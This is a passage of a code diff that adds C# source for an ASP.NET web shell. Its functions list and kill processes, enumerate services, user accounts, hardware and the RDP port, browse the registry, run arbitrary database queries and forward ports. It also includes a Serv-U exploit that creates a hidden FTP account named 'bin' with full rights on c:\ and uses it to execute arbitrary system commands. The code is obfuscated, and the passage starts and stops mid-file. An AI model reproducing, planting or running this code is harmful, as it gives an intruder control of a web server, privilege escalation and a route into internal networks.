+xseuB(ex.Message);
+continue;
+}
+}
+GlI.Controls.Add(TR);
+}
+}
+}
+catch(Exception ex)
+{
+xseuB(ex.Message);
+}
+}
+public ManagementObjectCollection PhQTd(string query)
+{
+ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
+return QS.Get();
+}
+public DataTable cCf(string query)
+{
+DataTable dt=new DataTable();
+int i=0;
+ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
+try
+{
+foreach(ManagementObject m in QS.Get())
+{
+DataRow dr=dt.NewRow();
+PropertyDataCollection.PropertyDataEnumerator oEnum;
+oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
+while(oEnum.MoveNext())
+{
+PropertyData DRU=(PropertyData)oEnum.Current;
+if(dt.Columns.IndexOf(DRU.Name)==-1)
+{
+dt.Columns.Add(DRU.Name);
+dt.Columns[dt.Columns.Count-1].DefaultValue="";
+}
+if(m[DRU.Name]!=null)
+{
+dr[DRU.Name]=m[DRU.Name].ToString();
+}
+else
+{
+dr[DRU.Name]=string.Empty;
+}
+}
+dt.Rows.Add(dr);
+}
+}
+catch(Exception error)
+{
+}
+return dt;
+}
+public void YUw()
+{
+try
+{
+Bin_H2_Title.InnerText="Process >>";
+WICxe();
+DCbS.Visible=true;
+int UEbTI=0;
+Process[] p=Process.GetProcesses();
+foreach(Process sp in p)
+{
+UEbTI++;
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+for(int i=1;i<7;i++)
+{
+TableCell td=new TableCell();
+if(i==1)
+{
+td.Width=Unit.Parse("2%");
+td.Text=UEbTI.ToString();
+tr.Controls.Add(td);
+}
+if(i==2)
+{
+td.Text=sp.Id.ToString();
+tr.Controls.Add(td);
+}
+if(i==3)
+{
+td.Text=sp.ProcessName.ToString();
+tr.Controls.Add(td);
+}
+if(i==4)
+{
+td.Text=sp.Threads.Count.ToString();
+tr.Controls.Add(td);
+}
+if(i==5)
+{
+td.Text=sp.BasePriority.ToString();
+tr.Controls.Add(td);
+}
+if(i==6)
+{
+td.Text="--";
+tr.Controls.Add(td);
+}
+}
+IjsL.Controls.Add(tr);
+}
+}
+catch(Exception error)
+{
+AIz();
+}
+AIz();
+}
+public void AIz()
+{
+try
+{
+Bin_H2_Title.InnerText="Process >>";
+WICxe();
+DCbS.Visible=true;
+int UEbTI=0;
+DataTable dt=cCf("Win32_Process");
+for(int j=0;j<dt.Rows.Count;j++)
+{
+UEbTI++;
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+for(int i=1;i<7;i++)
+{
+TableCell td=new TableCell();
+if(i==1)
+{
+td.Width=Unit.Parse("2%");
+td.Text=UEbTI.ToString();
+tr.Controls.Add(td);
+}
+if(i==2)
+{
+td.Text=dt.Rows[j]["ProcessID"].ToString();
+tr.Controls.Add(td);
+}
+if(i==3)
+{
+td.Text=dt.Rows[j]["Name"].ToString();
+tr.Controls.Add(td);
+}
+if(i==4)
+{
+td.Text=dt.Rows[j]["ThreadCount"].ToString();
+tr.Controls.Add(td);
+}
+if(i==5)
+{
+td.Text=dt.Rows[j]["Priority"].ToString();
+tr.Controls.Add(td);
+}
+if(i==6)
+{
+if( dt.Rows[j]["CommandLine"]!=string.Empty)
+{
+td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
+}
+else
+{
+td.Text="--";
+}
+tr.Controls.Add(td);
+}
+}
+IjsL.Controls.Add(tr);
+}
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public void urJG(string pid)
+{
+try
+{
+foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
+{
+p.InvokeMethod("Terminate",null);
+p.Dispose();
+}
+xseuB("Process Kill Success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+AIz();
+}
+public void oHpF()
+{
+try
+{
+Bin_H2_Title.InnerText="Services >>";
+WICxe();
+iQxm.Visible=true;
+int UEbTI=0;
+ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
+for(int i=0;i<kQmRu.Length;i++)
+{
+UEbTI++;
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+for(int b=1;b<7;b++)
+{
+TableCell td=new TableCell();
+if(b==1)
+{
+td.Width=Unit.Parse("2%");
+td.Text=UEbTI.ToString();
+tr.Controls.Add(td);
+}
+if(b==2)
+{
+td.Text="null";
+tr.Controls.Add(td);
+}
+if(b==3)
+{
+td.Text=kQmRu[i].ServiceName.ToString();
+tr.Controls.Add(td);
+}
+if(b==4)
+{
+td.Text="";
+tr.Controls.Add(td);
+}
+if(b==5)
+{
+string kOIo=kQmRu[i].Status.ToString();
+if(kOIo=="Running")
+{
+td.Text="<font color=green>"+kOIo+"</font>";
+}
+else
+{
+td.Text="<font color=red>"+kOIo+"</font>";
+}
+tr.Controls.Add(td);
+}
+if(b==6)
+{
+td.Text="";
+tr.Controls.Add(td);
+}
+}
+vHCs.Controls.Add(tr);
+}
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public void tZRH()
+{
+try
+{
+Bin_H2_Title.InnerText="Services >>";
+WICxe();
+iQxm.Visible=true;
+int UEbTI=0;
+DataTable dt=cCf("Win32_Service");
+for(int j=0;j<dt.Rows.Count;j++)
+{
+UEbTI++;
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();
+for(int i=1;i<7;i++)
+{
+TableCell td=new TableCell();
+if(i==1)
+{
+td.Width=Unit.Parse("2%");
+td.Text=UEbTI.ToString();
+tr.Controls.Add(td);
+}
+if(i==2)
+{
+td.Text=dt.Rows[j]["ProcessID"].ToString();
+tr.Controls.Add(td);
+}
+if(i==3)
+{
+td.Text=dt.Rows[j]["Name"].ToString();
+tr.Controls.Add(td);
+}
+if(i==4)
+{
+td.Text=dt.Rows[j]["PathName"].ToString();
+tr.Controls.Add(td);
+}
+if(i==5)
+{
+string kOIo=dt.Rows[j]["State"].ToString();
+if(kOIo=="Running")
+{
+td.Text="<font color=green>"+kOIo+"</font>";
+}
+else
+{
+td.Text="<font color=red>"+kOIo+"</font>";
+}
+tr.Controls.Add(td);
+}
+if(i==6)
+{
+td.Text=dt.Rows[j]["StartMode"].ToString();
+tr.Controls.Add(td);
+}
+}
+vHCs.Controls.Add(tr);
+}
+}
+catch(Exception error)
+{
+oHpF();
+}
+}
+public void PLd()
+{
+try
+{
+WICxe();
+xWVQ.Visible=true;
+Bin_H2_Title.InnerText="User Information >>";
+DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());
+foreach(DirectoryEntry child in TWQ.Children)
+{
+foreach(string name in child.Properties.PropertyNames)
+{
+PropertyValueCollection pvc=child.Properties[name];
+int c=pvc.Count;
+for(int i=0;i<c;i++)
+{
+if(name!="objectSid" && name!="Parameters" && name!="LoginHours")
+{
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+TableCell td=new TableCell();
+td.Text=name;
+tr.Controls.Add(td);
+TableCell td1=new TableCell();
+td1.Text=pvc[i].ToString();
+tr.Controls.Add(td1);
+VPa.Controls.Add(tr);
+}
+}
+}
+TableRow trn=new TableRow();
+for(int x=1;x<3;x++)
+{
+TableCell tdn=new TableCell();
+tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
+trn.Controls.Add(tdn);
+VPa.Controls.Add(trn);
+}
+}
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public void iLVUT()
+{
+try
+{
+WICxe();
+xWVQ.Visible=true;
+Bin_H2_Title.InnerText="User Information >>";
+DataTable user=cCf("Win32_UserAccount");
+for(int i=0;i<user.Rows.Count;i++)
+{
+for(int j=0;j<user.Columns.Count;j++)
+{
+string bg=OKM();
+TableRow tr=new TableRow();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+TableCell td=new TableCell();
+td.Text=user.Columns[j].ToString();
+tr.Controls.Add(td);
+TableCell td1=new TableCell();
+td1.Text=user.Rows[i][j].ToString();
+tr.Controls.Add(td1);
+VPa.Controls.Add(tr);
+}
+TableRow trn=new TableRow();
+for(int x=1;x<3;x++)
+{
+TableCell tdn=new TableCell();
+tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
+trn.Controls.Add(tdn);
+VPa.Controls.Add(trn);
+}
+}
+}
+catch(Exception error)
+{
+PLd();
+}
+}
+public void pDVM()
+{
+try
+{
+RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");
+string IKjwH=DdmPl(EeZ,"PortNumber");
+RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");
+int cpu=izN.SubKeyCount;
+RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");
+string NPPZ=DdmPl(mQII,"ProcessorNameString");
+WICxe();
+ghaB.Visible=true;
+Bin_H2_Title.InnerText="System Information >>";
+Bin_H2_Mac.InnerText="MAC Information >>";
+Bin_H2_Driver.InnerText="Driver Information >>";
+StringBuilder yEwc=new StringBuilder();
+StringBuilder hwJeS=new StringBuilder();
+StringBuilder jXkaE=new StringBuilder();
+yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");
+yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");
+yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");
+yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");
+yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");
+yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");
+yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");
+yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");
+DataTable BIOS=cCf("Win32_BIOS");
+yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");
+yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");
+yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");
+DataTable upM=cCf("Win32_PhysicalMemory");
+Int64 oZnZV=0;
+for(int i=0;i<upM.Rows.Count;i++)
+{
+oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());
+}
+yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");
+DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");
+for(int i=0;i<dOza.Rows.Count;i++)
+{
+hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");
+if(dOza.Rows[i]["MACAddress"]!=string.Empty)
+{
+hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");
+}
+}
+DataTable Driver=cCf("Win32_SystemDriver");
+for (int i=0; i<Driver.Rows.Count; i++)
+{
+jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");
+if (Driver.Rows[i]["PathName"]!=string.Empty)
+{
+jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);
+}
+else
+{
+jXkaE.Append("No path information");
+}
+jXkaE.Append("</li>");
+}
+Bin_Ul_Sys.InnerHtml=yEwc.ToString();
+Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();
+Bin_Ul_Driver.InnerHtml=jXkaE.ToString();
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public void ADCpk()
+{
+WICxe();
+APl.Visible=true;
+Bin_H2_Title.InnerText="Serv-U Exec >>";
+}
+public void lDODR()
+{
+string JGGg=string.Empty;
+string user=dNohJ.Value;
+string pass=NMd.Value;
+int port=Int32.Parse(HlQl.Value);
+string cmd=mHbjB.Value;
+string CRtK="user "+user+"\r\n";
+string jnNG="pass "+pass+"\r\n";
+string site="SITE MAINTENANCE\r\n";
+string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
+string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
+string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
+string zexn="QUIT\r\n";
+UHlA.Visible=true;
+try
+{
+tcp.Connect("127.0.0.1",port);
+tcp.ReceiveBufferSize=1024;
+NS=tcp.GetStream();
+Rev(NS);
+ZJiM(NS,CRtK);
+Rev(NS);
+ZJiM(NS,jnNG);
+Rev(NS);
+ZJiM(NS,site);
+Rev(NS);
+ZJiM(NS,mtoJb);
+Rev(NS);
+ZJiM(NS,sutI);
+Rev(NS);
+ZJiM(NS,iVDT);
+Rev(NS);
+Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";
+zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);
+NS1=zvxm.GetStream();
+Rev(NS1);
+ZJiM(NS1,"user bin\r\n");
+Rev(NS1);
+ZJiM(NS1,"pass binftp\r\n");
+Rev(NS1);
+ZJiM(NS1,"site exec "+cmd+"\r\n");
+Rev(NS1);
+ZJiM(NS1,"quit\r\n");
+Rev(NS1);
+zvxm.Close();
+ZJiM(NS,mtoJb);
+Rev(NS);
+tcp.Close();
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+protected void Rev(NetworkStream instream)
+{
+string FTBtf=string.Empty;
+if(instream.CanRead)
+{
+byte[] uPZ=new byte[1024];
+do
+{
+System.Threading.Thread.Sleep(50);
+int len=instream.Read(uPZ,0,uPZ.Length);
+FTBtf+=Encoding.Default.GetString(uPZ,0,len);
+}
+while(instream.DataAvailable);
+}
+Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";
+}
+protected void ZJiM(NetworkStream instream,string Sendstr)
+{
+if(instream.CanWrite)
+{
+byte[] uPZ=Encoding.Default.GetBytes(Sendstr);
+instream.Write(uPZ,0,uPZ.Length);
+}
+Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";
+}
+public void xFhz()
+{
+WICxe();
+kkHN.Visible=true;
+Bin_H2_Title.InnerText="RegShell >>";
+string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
+vyX.Text="";
+foreach(string rootkey in txc.Split('|'))
+{
+vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";
+}
+lFAvw();
+}
+protected void lFAvw()
+{
+qPdI.Text="";
+string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
+TableRow tr;
+TableCell tc;
+foreach(string rootkey in txc.Split('|'))
+{
+tr=new TableRow();
+tc=new TableCell();
+string bg=OKM();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tc.Width=Unit.Parse("40%");
+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";
+tr.Cells.Add(tc);
+tc=new TableCell();
+tc.Width=Unit.Parse("60%");
+tc.Text="&lt;RootKey&gt;";
+tr.Cells.Add(tc);
+pLWD.Rows.Add(tr);
+}
+}
+protected void tpRQ(string Reg_Path)
+{
+if(!Reg_Path.EndsWith("\\"))
+{
+Reg_Path=Reg_Path+"\\";
+}
+qPdI.Text=Reg_Path;
+string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");
+cJG=Regex.Replace(cJG,@"\\+","\\");
+TableRow tr=new TableRow();
+TableCell tc=new TableCell();
+string bg=OKM();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";
+tc.Attributes["colspan"]="2" ;
+tr.Cells.Add(tc);
+pLWD.Rows.Add(tr);
+try
+{
+string subpath;
+string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);
+RegistryKey rk=null;
+RegistryKey sk;
+if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))
+{
+rk=Registry.LocalMachine;
+}
+else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))
+{
+rk=Registry.ClassesRoot;
+}
+else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))
+{
+rk=Registry.CurrentUser;
+}
+else if(Reg_Path.StartsWith("HKEY_USERS"))
+{
+rk=Registry.Users;
+}
+else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))
+{
+rk=Registry.CurrentConfig;
+}
+if(kDgkX.Length>1)
+{
+sk=rk.OpenSubKey(kDgkX);
+}
+else
+{
+sk=rk;
+}
+foreach(string innerSubKey in sk.GetSubKeyNames())
+{
+tr=new TableRow();
+tc=new TableCell();
+bg=OKM();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tc.Width=Unit.Parse("40%");
+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";
+tr.Cells.Add(tc);
+tc=new TableCell();
+tc.Width=Unit.Parse("60%");
+tc.Text="&lt;SubKey&gt;";
+tr.Cells.Add(tc);
+pLWD.Rows.Add(tr);
+}
+TableRow cKVA=new TableRow();
+cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
+cKVA.Attributes["bgcolor"]="#dddddd";
+TableCell JlmW=new TableCell();
+JlmW.Attributes["colspan"]="2" ;
+JlmW.Attributes["height"]="5";
+cKVA.Cells.Add(JlmW);
+pLWD.Rows.Add(cKVA);
+foreach(string strValueName in sk.GetValueNames())
+{
+tr=new TableRow();
+tc=new TableCell();
+bg=OKM();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tc.Width=Unit.Parse("40%");
+tc.Text=strValueName;
+tr.Cells.Add(tc);
+tc=new TableCell();
+tc.Width=Unit.Parse("60%");
+tc.Text=DdmPl(sk,strValueName);
+tr.Cells.Add(tc);
+pLWD.Rows.Add(tr);
+}
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public string DdmPl(RegistryKey sk,string strValueName)
+{
+object uPZ;
+string RaTGr="";
+try
+{
+uPZ=sk.GetValue(strValueName,"NULL");
+if(uPZ.GetType()==typeof(byte[]))
+{
+foreach(byte tmpbyte in(byte[])uPZ)
+{
+if((int)tmpbyte<16)
+{
+RaTGr+="0";
+}
+RaTGr+=tmpbyte.ToString("X");
+}
+}
+else if(uPZ.GetType()==typeof(string[]))
+{
+foreach(string tmpstr in(string[])uPZ)
+{
+RaTGr+=tmpstr;
+}
+}
+else
+{
+RaTGr=uPZ.ToString();
+}
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+return RaTGr;
+}
+public void vNCHZ()
+{
+WICxe();
+YwLB.Visible=true;
+Bin_H2_Title.InnerText="PortScan >>";
+}
+public void rAhe()
+{
+WICxe();
+iDgmL.Visible=true;
+dQIIF.Visible=false;
+Bin_H2_Title.InnerText="DataBase >>";
+}
+protected void OUj()
+{
+if(Dtdr.State==ConnectionState.Closed)
+{
+try
+{
+Dtdr.ConnectionString=MasR.Text;
+Kkvb.Connection=Dtdr;
+Dtdr.Open();
+}
+catch(Exception Error)
+{
+xseuB(Error.Message);
+}
+}
+}
+protected void fUzE()
+{
+if(Dtdr.State==ConnectionState.Open)
+Dtdr.Close();
+Dtdr.Dispose();
+Kkvb.Dispose();
+}
+public DataTable CYUe(string sqlstr)
+{
+OleDbDataAdapter da=new OleDbDataAdapter();
+DataTable Dstog=new DataTable();
+try
+{
+OUj();
+Kkvb.CommandType=CommandType.Text;
+Kkvb.CommandText=sqlstr;
+da.SelectCommand=Kkvb;
+da.Fill(Dstog);
+}
+catch(Exception)
+{
+}
+finally
+{
+fUzE();
+}
+return Dstog;
+}
+public DataTable[] Bin_Data(string query)
+{
+ArrayList list=new ArrayList();
+try
+{
+string str;
+OUj();
+query=query+"\r\n";
+MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);
+int EmRX=0;
+for(int i=0;i<gcod.Count;i++)
+{
+Match FJD=gcod[i];
+str=query.Substring(EmRX,FJD.Index-EmRX);
+if(str.Trim().Length>0)
+{
+OleDbDataAdapter FgzeQ=new OleDbDataAdapter();
+Kkvb.CommandType=CommandType.Text;
+Kkvb.CommandText=str.Trim();
+FgzeQ.SelectCommand=Kkvb;
+DataSet cDPp=new DataSet();
+FgzeQ.Fill(cDPp);
+for(int j=0;j<cDPp.Tables.Count;j++)
+{
+list.Add(cDPp.Tables[j]);
+}
+}
+EmRX=FJD.Index+3;
+}
+str=query.Substring(EmRX,query.Length-EmRX);
+if(str.Trim().Length>0)
+{
+OleDbDataAdapter VwB=new OleDbDataAdapter();
+Kkvb.CommandType=CommandType.Text;
+Kkvb.CommandText=str.Trim();
+VwB.SelectCommand=Kkvb;
+DataSet arG=new DataSet();
+VwB.Fill(arG);
+for(int k=0;k<arG.Tables.Count;k++)
+{
+list.Add(arG.Tables[k]);
+}
+}
+}
+catch(SqlException e)
+{
+xseuB(e.Message);
+rom.Visible=false;
+}
+return(DataTable[])list.ToArray(typeof(DataTable));
+}
+public void JIAKU(string instr)
+{
+try
+{
+OUj();
+Kkvb.CommandType=CommandType.Text;
+Kkvb.CommandText=instr;
+Kkvb.ExecuteNonQuery();
+}
+catch(Exception e)
+{
+xseuB(e.Message);
+}
+}
+public void dwgT()
+{
+try
+{
+OUj();
+if(WYmo.SelectedItem.Text=="MSSQL")
+{
+if(Pvf.SelectedItem.Value!="")
+{
+Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());
+}
+}
+DataTable[] jxF=null;
+jxF=Bin_Data(jHIy.InnerText);
+if(jxF!=null && jxF.Length>0)
+{
+for(int j=0;j<jxF.Length;j++)
+{
+rom.PreRender+=new EventHandler(lRavM);
+rom.DataSource=jxF[j];
+rom.DataBind();
+for(int i=0;i<rom.Items.Count;i++)
+{
+string bg=OKM();
+rom.Items[i].CssClass=bg;
+rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
+rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
+}
+}
+}
+else
+{
+rom.DataSource=null;
+rom.DataBind();
+}
+rom.Visible=true;
+}
+catch(Exception e)
+{
+xseuB(e.Message);
+rom.Visible=false;
+}
+}
+public void xTZY()
+{
+try
+{
+if(WYmo.SelectedItem.Text=="MSSQL")
+{
+if(Pvf.SelectedItem.Value=="")
+{
+rom.DataSource=null;
+rom.DataBind();
+return;
+}
+}
+OUj();
+DataTable zKvOw=new DataTable();
+DataTable jxF=new DataTable();
+DataTable baVJV=new DataTable();
+if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")
+{
+Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);
+}
+zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });
+jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });
+foreach(DataRow dr in zKvOw.Rows)
+{
+jxF.ImportRow(dr);
+}
+jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");
+rom.PreRender+=new EventHandler(lRavM);
+rom.DataSource=jxF;
+rom.DataBind();
+for(int i=0;i<rom.Items.Count;i++)
+{
+string bg=OKM();
+rom.Items[i].CssClass=bg;
+rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
+rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
+}
+rom.Visible=true;
+}
+catch(Exception e)
+{
+xseuB(e.Message);
+rom.Visible=false;
+}
+}
+private void lRavM(object sender,EventArgs e)
+{
+DataGrid d=(DataGrid)sender;
+foreach(DataGridItem item in d.Items)
+{
+foreach(TableCell t in item.Cells)
+{
+t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");
+}
+}
+}
+public void vCf()
+{
+dQIIF.Visible=true;
+try
+{
+jHIy.InnerHtml=string.Empty;
+if(WYmo.SelectedItem.Text=="MSSQL")
+{
+rom.Visible=false;
+uXevN.Visible=true;
+irTU.Visible=true;
+OUj();
+DataTable ver=CYUe(@"SELECT @@VERSION");
+DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");
+DataTable cdb=CYUe(@"SELECT DB_NAME()");
+DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
+DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");
+string jHlh=ver.Rows[0][0].ToString();
+string dbo=string.Empty;
+if(YKrm.Rows[0][0].ToString()=="1")
+{
+dbo="db_owner";
+}
+else
+{
+dbo="public";
+}
+if(rol.Rows[0][0].ToString()=="1")
+{
+dbo="<font color=blue>sa</font>";
+}
+string db_name=string.Empty;
+foreach(ListItem item in FGEy.Items)
+{
+ if(item.Selected=true)
+ {
+ item.Selected=false;
+ }
+}
+Pvf.Items.Clear();
+Pvf.Items.Add("-- Select a DataBase --");
+Pvf.Items[0].Value="";
+for(int i=0;i<dbs.Rows.Count;i++)
+{
+db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";
+Pvf.Items.Add(dbs.Rows[i][0].ToString());
+}
+irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";
+}
+else
+{
+uXevN.Visible=false;
+irTU.Visible=false;
+xTZY();
+}
+}
+catch(Exception e)
+{
+dQIIF.Visible=false;
+}
+}
+public void MHLv()
+{
+WICxe();
+hOWTm.Visible=true;
+Bin_H2_Title.InnerText="PortMap >>";
+}
+public class PortForward
+{
+public string Localaddress;
+public int LocalPort;
+public string RemoteAddress;
+public int RemotePort;
+string type;
+Socket ltcpClient;
+Socket rtcpClient;
+Socket server;
+byte[] DPrPL=new byte[2048];
+byte[] wvZv=new byte[2048];
+public struct session
+{
+public Socket rdel;
+public Socket ldel;
+public int llen;
+public int rlen;
+}
+public static IPEndPoint mtJ(string host,int port)
+{
+IPEndPoint iep=null;
+IPHostEntry aGN=Dns.Resolve(host);
+IPAddress rmt=aGN.AddressList[0];
+iep=new IPEndPoint(rmt,port);
+return iep;
+}
+public void Start(string Rip,int Rport,string lip,int lport)
+{
+try
+{
+LocalPort=lport;
+RemoteAddress=Rip;
+RemotePort=Rport;
+Localaddress=lip;
+rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
+ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
+rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);
+}
+catch (Exception ex) { }
+}
+protected void iiGFO(IAsyncResult ar)
+{
+try
+{
+session RKXy=new session();
+RKXy.ldel=ltcpClient;
+RKXy.rdel=rtcpClient;
+ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);
+}
